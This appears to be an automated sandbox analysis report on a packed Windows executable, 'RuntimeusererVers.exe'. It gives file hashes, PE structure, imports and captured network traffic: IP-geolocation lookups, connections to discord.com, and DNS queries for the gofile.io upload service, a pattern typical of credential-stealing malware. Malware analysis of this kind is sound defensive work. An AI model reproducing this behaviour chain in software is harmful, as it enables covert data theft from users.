                                                                                                                                                                                                                                        SSDEEP:24:/X8jyAbnZdGxzRopIIg0xlAqLR61W80Ic9ALjzEk1CceqZQ:gyYnjGxdKL8NlMAzEk0EK
                                                                                                                                                                                                                                        MD5:960ECA5919CC00E1B4542A6E039F413E
                                                                                                                                                                                                                                        SHA1:2079091F1BDF5B543413D549EF9C47C5269659BA
                                                                                                                                                                                                                                        SHA-256:A103755C416B99D910D0F9B374453FADF614C0C87307A63DB0591D47EBBD14F4
                                                                                                                                                                                                                                        SHA-512:57D6AD727BEB9ADB7DED05BC0FCE84B43570492DA4E7A0CCAB42FFF2D4EEF6410AEDC446F2D2F07D9CE524C4640B0FB6E13DCD819051E7B233B35F8672A5ADB7
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1026
                                                                                                                                                                                                                                        Entropy (8bit):4.69422273140364
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:hdGRma8y0UOkmVb01yh9qfT+PsSMxto3vIcMhrzxYWSDHtj:hdGRma6bRh9rsFE/uhrOWSDHh
                                                                                                                                                                                                                                        MD5:A686C2E2230002C3810CB3638589BF01
                                                                                                                                                                                                                                        SHA1:4B764DD14070E52A2AC0458F401CDD5724E714FB
                                                                                                                                                                                                                                        SHA-256:38F526D338AC47F7C2CAB7AB654A375C87E51CC56B4FA09A7C5769E2FB472FFC
                                                                                                                                                                                                                                        SHA-512:1F2AA9D4B55B52C32EF0C88189256562B16DF13EEA0564BD7B47E45CC39279F39823033ADF95BBD9A50B4F35E417E418C4D20BBE14EF425EFF7134ECE05BEB3F
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                        Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                        MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                        SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                        SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                        SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                                                                        Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                        MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                        SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                        SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                        SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        File type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Entropy (8bit):7.99601949446881
                                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                                        • Win64 Executable Console (202006/5) 77.37%
                                                                                                                                                                                                                                        • InstallShield setup (43055/19) 16.49%
                                                                                                                                                                                                                                        • Win64 Executable (generic) (12005/4) 4.60%
                                                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.77%
                                                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.77%
                                                                                                                                                                                                                                        File name:RuntimeusererVers.exe
                                                                                                                                                                                                                                        File size:13'747'712 bytes
                                                                                                                                                                                                                                        MD5:4fd34971f2551e33806360ba5ee86e5e
                                                                                                                                                                                                                                        SHA1:a3f2fe7d770d45c0b98bdbdf3322614582e41d59
                                                                                                                                                                                                                                        SHA256:e82fe9ce4fec710c6f02dc3ed738e5a88955d4d938957ec2b49119d5018ecb81
                                                                                                                                                                                                                                        SHA512:1c01226cb0a061675a8af6db24dea570881bbd7a2d6c8e21aaf51884bf4b64a2011dcc881507fb0b0a0191f8dc180831833eb175f07d6fdee72ed11748183281
                                                                                                                                                                                                                                        SSDEEP:393216:85CCDJlS/FyOUUGafnbRngsndGKLYHSJj:8oCytjGafSsdx4k
                                                                                                                                                                                                                                        TLSH:A1D6338CF1B202F9F339C4B898651999D696BC25234053A707F4B7F97DB3AE47D29220
                                                                                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................................U............&W......&.......&.......&.......................!.......!......Rich............PE..d..
                                                                                                                                                                                                                                        Icon Hash:9d2359a5a6a55b26
                                                                                                                                                                                                                                        Entrypoint:0x14000c59c
                                                                                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                                                                                                        Subsystem:windows cui
                                                                                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                        Time Stamp:0x67367342 [Thu Nov 14 22:01:38 2024 UTC]
                                                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                                                        OS Version Major:6
                                                                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                                                                        File Version Major:6
                                                                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                                                                        Subsystem Version Major:6
                                                                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                                                                        Import Hash:b2e44a6d3c3de37e08023deb2b2f60a9
                                                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                                        sub esp, 28h
                                                                                                                                                                                                                                        call 00007FE9E5073DA0h
                                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                                        add esp, 28h
                                                                                                                                                                                                                                        jmp 00007FE9E50739C7h
                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                                        sub esp, 28h
                                                                                                                                                                                                                                        call 00007FE9E5074400h
                                                                                                                                                                                                                                        test eax, eax
                                                                                                                                                                                                                                        je 00007FE9E5073B73h
                                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                                        mov eax, dword ptr [00000030h]
                                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                                        mov ecx, dword ptr [eax+08h]
                                                                                                                                                                                                                                        jmp 00007FE9E5073B57h
                                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                                        cmp ecx, eax
                                                                                                                                                                                                                                        je 00007FE9E5073B66h
                                                                                                                                                                                                                                        xor eax, eax
                                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                                        cmpxchg dword ptr [00022A9Ch], ecx
                                                                                                                                                                                                                                        jne 00007FE9E5073B40h
                                                                                                                                                                                                                                        xor al, al
                                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                                        add esp, 28h
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2cf04 | 0x3c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x43000 | 0xcecd98 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x41000 | 0x17ac | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xd30000 | 0x684 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x2af40 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x2ae00 | 0x140 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x21000 | 0x2d8 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x1fc90 | 0x1fe00 | 5772491340cfe81e6de84ce2e8905aa3 | False | 0.5641084558823529 | data | 6.502446284545095 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x21000 | 0xc89a | 0xca00 | 56e965ade0cf76c53513a74c4f508fca | False | 0.47762608292079206 | data | 5.130695219936989 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x2e000 | 0x12e60 | 0xc00 | f9a6d5bad872353804a874c215e16cb0 | False | 0.13736979166666666 | data | 1.9572528860448992 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0x41000 | 0x17ac | 0x1800 | a27677e2df37cb566c946e496bef440b | False | 0.48193359375 | PEX Binary Archive | 5.210452915848361 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x43000 | 0xcecd98 | 0xcece00 | 72300b9b9f922fbb3a2bac93973ae152 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xd30000 | 0x684 | 0x800 | 77d0e2d4a30e95c86627483da2995014 | False | 0.5107421875 | data | 4.935886757432297 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x431f0 | 0x34ac | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9788638386235539
RT_ICON | 0x4669c | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2835 x 2835 px/m | | | 0.1274896265560166
RT_ICON | 0x48c44 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2835 x 2835 px/m | | | 0.19113508442776736
RT_ICON | 0x49cec | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304, resolution 2835 x 2835 px/m | | | 0.2725409836065574
RT_ICON | 0x4a674 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2835 x 2835 px/m | | | 0.41134751773049644
RT_RCDATA | 0x4aadc | 0xce4e78 | data | | | 1.0002832412719727
RT_GROUP_ICON | 0xd2f954 | 0x4c | data | | | 0.7763157894736842
RT_MANIFEST | 0xd2f9a0 | 0x3f8 | ASCII text, with very long lines (1016), with no line terminators | | | 0.4655511811023622
DLL | Import
SHELL32.dll | SHFileOperationW, SHGetFolderPathW
KERNEL32.dll | SetLastError, WriteConsoleW, CreateDirectoryW, SizeofResource, SetConsoleCtrlHandler, GetCommandLineW, GetStdHandle, WriteFile, TerminateProcess, GetModuleFileNameW, SetEnvironmentVariableW, GetTempPathW, FindResourceA, WaitForSingleObject, CreateFileW, GetFileAttributesW, Sleep, GetLastError, LockResource, CloseHandle, LoadResource, GetProcAddress, GetCurrentProcessId, CreateProcessW, WideCharToMultiByte, GetSystemTimeAsFileTime, FormatMessageA, GetExitCodeProcess, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentThreadId, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, HeapReAlloc, RtlUnwindEx, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, EncodePointer, RaiseException, RtlPcToFileHeader, ExitProcess, GetModuleHandleExW, GetCommandLineA, HeapAlloc, MultiByteToWideChar, HeapFree, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, CompareStringW, LCMapStringW, GetFileType, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetStringTypeW, GetProcessHeap, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, GetFileSizeEx, SetFilePointerEx, HeapSize
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:16.697151899 CET44349741159.89.102.253192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:16.697191954 CET49741443192.168.2.10159.89.102.253
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:16.697770119 CET49741443192.168.2.10159.89.102.253
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:16.733345985 CET49751443192.168.2.10162.159.138.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:16.733390093 CET44349751162.159.138.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:16.733463049 CET49751443192.168.2.10162.159.138.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:16.734194994 CET49751443192.168.2.10162.159.138.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:16.734209061 CET44349751162.159.138.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:17.340249062 CET44349751162.159.138.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:17.349421024 CET49751443192.168.2.10162.159.138.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:17.349452972 CET44349751162.159.138.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:17.350730896 CET44349751162.159.138.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:17.350807905 CET49751443192.168.2.10162.159.138.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:17.404357910 CET49751443192.168.2.10162.159.138.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:17.404577017 CET44349751162.159.138.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:17.404824972 CET49751443192.168.2.10162.159.138.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:17.404838085 CET44349751162.159.138.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:17.404939890 CET49751443192.168.2.10162.159.138.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:17.451339006 CET44349751162.159.138.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:17.641740084 CET44349751162.159.138.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:17.641875982 CET44349751162.159.138.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:17.641952038 CET49751443192.168.2.10162.159.138.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:17.645195961 CET49751443192.168.2.10162.159.138.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:17.645226002 CET44349751162.159.138.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:17.727030993 CET49757443192.168.2.10162.159.136.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:17.727077961 CET44349757162.159.136.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:17.727157116 CET49757443192.168.2.10162.159.136.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:17.727941036 CET49757443192.168.2.10162.159.136.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:17.727955103 CET44349757162.159.136.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:18.335365057 CET44349757162.159.136.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:18.336114883 CET49757443192.168.2.10162.159.136.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:18.336169958 CET44349757162.159.136.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:18.337204933 CET44349757162.159.136.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:18.337286949 CET49757443192.168.2.10162.159.136.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:18.338210106 CET49757443192.168.2.10162.159.136.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:18.338287115 CET44349757162.159.136.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:18.338624954 CET49757443192.168.2.10162.159.136.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:18.338644028 CET44349757162.159.136.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:18.338716030 CET49757443192.168.2.10162.159.136.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:18.379349947 CET44349757162.159.136.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:18.606543064 CET44349757162.159.136.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:18.606616974 CET44349757162.159.136.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:18.606839895 CET49757443192.168.2.10162.159.136.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:18.607382059 CET49757443192.168.2.10162.159.136.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:18.607425928 CET44349757162.159.136.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:20.889046907 CET4977680192.168.2.10208.95.112.1
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:20.893882036 CET8049776208.95.112.1192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:20.894360065 CET4977680192.168.2.10208.95.112.1
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:20.894871950 CET4977680192.168.2.10208.95.112.1
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:20.899597883 CET8049776208.95.112.1192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:21.499113083 CET8049776208.95.112.1192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:21.500260115 CET4977680192.168.2.10208.95.112.1
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:21.505718946 CET8049776208.95.112.1192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:21.505786896 CET4977680192.168.2.10208.95.112.1
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:42.094146967 CET49901443192.168.2.10162.159.138.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:42.094199896 CET44349901162.159.138.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:42.094285011 CET49901443192.168.2.10162.159.138.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:42.095227957 CET49901443192.168.2.10162.159.138.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:42.095244884 CET44349901162.159.138.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:42.703792095 CET44349901162.159.138.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:42.704350948 CET49901443192.168.2.10162.159.138.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:42.704360008 CET44349901162.159.138.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:42.705348015 CET44349901162.159.138.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:42.705411911 CET49901443192.168.2.10162.159.138.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:42.706552029 CET49901443192.168.2.10162.159.138.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:42.706614017 CET44349901162.159.138.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:42.706979036 CET49901443192.168.2.10162.159.138.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:42.706985950 CET44349901162.159.138.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:42.707091093 CET49901443192.168.2.10162.159.138.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:42.747333050 CET44349901162.159.138.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:42.871304989 CET49901443192.168.2.10162.159.138.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:42.960221052 CET44349901162.159.138.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:42.960521936 CET44349901162.159.138.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:42.960587978 CET49901443192.168.2.10162.159.138.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:42.961215019 CET49901443192.168.2.10162.159.138.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:42.961234093 CET44349901162.159.138.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:42.963757038 CET49907443192.168.2.10162.159.136.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:42.963851929 CET44349907162.159.136.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:42.963933945 CET49907443192.168.2.10162.159.136.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:42.964580059 CET49907443192.168.2.10162.159.136.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:42.964616060 CET44349907162.159.136.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:43.573920012 CET44349907162.159.136.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:43.574624062 CET49907443192.168.2.10162.159.136.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:43.574686050 CET44349907162.159.136.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:43.578468084 CET44349907162.159.136.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:43.579071999 CET49907443192.168.2.10162.159.136.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:43.579560995 CET49907443192.168.2.10162.159.136.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:43.579699993 CET49907443192.168.2.10162.159.136.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:43.579713106 CET44349907162.159.136.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:43.579757929 CET44349907162.159.136.232192.168.2.10
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:43.581140041 CET49907443192.168.2.10162.159.136.232
                                                                                                                                                                                                                                        Nov 15, 2024 10:46:43.581178904 CET44349907162.159.136.232192.168.2.10
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 15, 2024 10:46:13.901212931 CET | 192.168.2.10 | 1.1.1.1 | 0x7a5a | Standard query (0) | geolocation-db.com | A (IP address) | IN (0x0001) | false
Nov 15, 2024 10:46:16.725461006 CET | 192.168.2.10 | 1.1.1.1 | 0x1992 | Standard query (0) | discord.com | A (IP address) | IN (0x0001) | false
Nov 15, 2024 10:46:20.848252058 CET | 192.168.2.10 | 1.1.1.1 | 0xa2a4 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Nov 15, 2024 10:46:46.101866961 CET | 192.168.2.10 | 1.1.1.1 | 0x2496 | Standard query (0) | api.gofile.io | A (IP address) | IN (0x0001) | false
Nov 15, 2024 10:46:47.447783947 CET | 192.168.2.10 | 1.1.1.1 | 0xbb67 | Standard query (0) | store1.gofile.io | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 15, 2024 10:46:13.908179998 CET | 1.1.1.1 | 192.168.2.10 | 0x7a5a | No error (0) | geolocation-db.com | | 159.89.102.253 | A (IP address) | IN (0x0001) | false
Nov 15, 2024 10:46:16.732328892 CET | 1.1.1.1 | 192.168.2.10 | 0x1992 | No error (0) | discord.com | | 162.159.138.232 | A (IP address) | IN (0x0001) | false
Nov 15, 2024 10:46:16.732328892 CET | 1.1.1.1 | 192.168.2.10 | 0x1992 | No error (0) | discord.com | | 162.159.136.232 | A (IP address) | IN (0x0001) | false
Nov 15, 2024 10:46:16.732328892 CET | 1.1.1.1 | 192.168.2.10 | 0x1992 | No error (0) | discord.com | | 162.159.137.232 | A (IP address) | IN (0x0001) | false
Nov 15, 2024 10:46:16.732328892 CET | 1.1.1.1 | 192.168.2.10 | 0x1992 | No error (0) | discord.com | | 162.159.128.233 | A (IP address) | IN (0x0001) | false
Nov 15, 2024 10:46:16.732328892 CET | 1.1.1.1 | 192.168.2.10 | 0x1992 | No error (0) | discord.com | | 162.159.135.232 | A (IP address) | IN (0x0001) | false
Nov 15, 2024 10:46:20.855205059 CET | 1.1.1.1 | 192.168.2.10 | 0xa2a4 | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Nov 15, 2024 10:46:46.109077930 CET | 1.1.1.1 | 192.168.2.10 | 0x2496 | No error (0) | api.gofile.io | | 45.112.123.126 | A (IP address) | IN (0x0001) | false
Nov 15, 2024 10:46:47.454961061 CET | 1.1.1.1 | 192.168.2.10 | 0xbb67 | No error (0) | store1.gofile.io | | 45.112.123.227 | A (IP address) | IN (0x0001) | false
                                                                                                                                                                                                                                        • geolocation-db.com
                                                                                                                                                                                                                                        • discord.com
                                                                                                                                                                                                                                        • api.gofile.io
                                                                                                                                                                                                                                        • store1.gofile.io
                                                                                                                                                                                                                                        • ip-api.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.10 | 49776 | 208.95.112.1 | 80 | 8168 | C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe
Timestamp | Bytes transferred | Direction | Data
Nov 15, 2024 10:46:20.894871950 CET | 124 | OUT | GET /json HTTP/1.1
                                                                                                                                                                                                                                        Host: ip-api.com
                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                        User-Agent: Python/3.11 aiohttp/3.8.4
Nov 15, 2024 10:46:21.499113083 CET | 468 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                        Date: Fri, 15 Nov 2024 09:46:20 GMT
                                                                                                                                                                                                                                        Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                        Content-Length: 291
                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                        X-Ttl: 60
                                                                                                                                                                                                                                        X-Rl: 44
                                                                                                                                                                                                                                        Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"TX","regionName":"Texas","city":"Killeen","zip":"76549","lat":31.0065,"lon":-97.8406,"timezone":"America/Chicago","isp":"QuadraNet","org":"OMGITSFAST","as":"AS8100 QuadraNet Enterprises LLC","query":"173.254.250.89"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.10 | 49734 | 159.89.102.253 | 443 | 8168 | C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-15 09:46:15 UTC | 126 | OUT | GET /json HTTP/1.1
                                                                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                                                                        Host: geolocation-db.com
                                                                                                                                                                                                                                        User-Agent: Python-urllib/3.11
                                                                                                                                                                                                                                        Connection: close
2024-11-15 09:46:15 UTC | 211 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Fri, 15 Nov 2024 09:46:15 GMT
                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                        Content-Length: 194
                                                                                                                                                                                                                                        Location: https://geolocation-db.com/json/
                                                                                                                                                                                                                                        Connection: close
